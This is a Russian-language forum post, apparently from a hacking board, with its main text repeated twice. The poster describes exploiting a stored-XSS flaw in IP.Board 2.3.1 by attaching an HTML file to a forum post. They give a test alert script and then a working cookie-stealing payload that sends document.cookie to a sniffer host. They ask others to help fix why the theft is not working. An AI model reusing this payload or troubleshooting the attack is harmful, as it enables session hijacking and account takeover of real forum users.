Zipper-rus
21.08.2008, 14:15
Кароче есть форум IP.Board 2.3.1 , я нашёл на этом форуме уязвимость подходящая под эту версию. Вот она :
http://forum.antichat.ru/showpost.php?p=695836&postcount=22
Кароче я прочитал зашёл на сайт и оставил пост туда прицепил файл (аттачем) , как и написано назвал any.html , и туда вписал <script>alert(/Hello/)</script> .
В итоге пост с файлом создался , и я перешёл по линку прикреплённого файла .html, Алерт сработал и я увидел (Hello). После удалил <script>alert(/Hello/)</script> и вписал <script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> , теперь переходу по файлу файл загружается пустым , сматрю исходный текст в IE , и вижу что скрипт в файле есть , но в сниффере тишина (( Подскажите что я неправильно сделал и что нужно исправить ??
http://forum.antichat.ru/showpost.php?p=695836&postcount=22
Кароче я прочитал зашёл на сайт и оставил пост туда прицепил файл (аттачем) , как и написано назвал any.html , и туда вписал <script>alert(/Hello/)</script> .
В итоге пост с файлом создался , и я перешёл по линку прикреплённого файла .html, Алерт сработал и я увидел (Hello). После удалил <script>alert(/Hello/)</script> и вписал <script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> , теперь переходу по файлу файл загружается пустым , сматрю исходный текст в IE , и вижу что скрипт в файле есть , но в сниффере тишина (( Подскажите что я неправильно сделал и что нужно исправить ??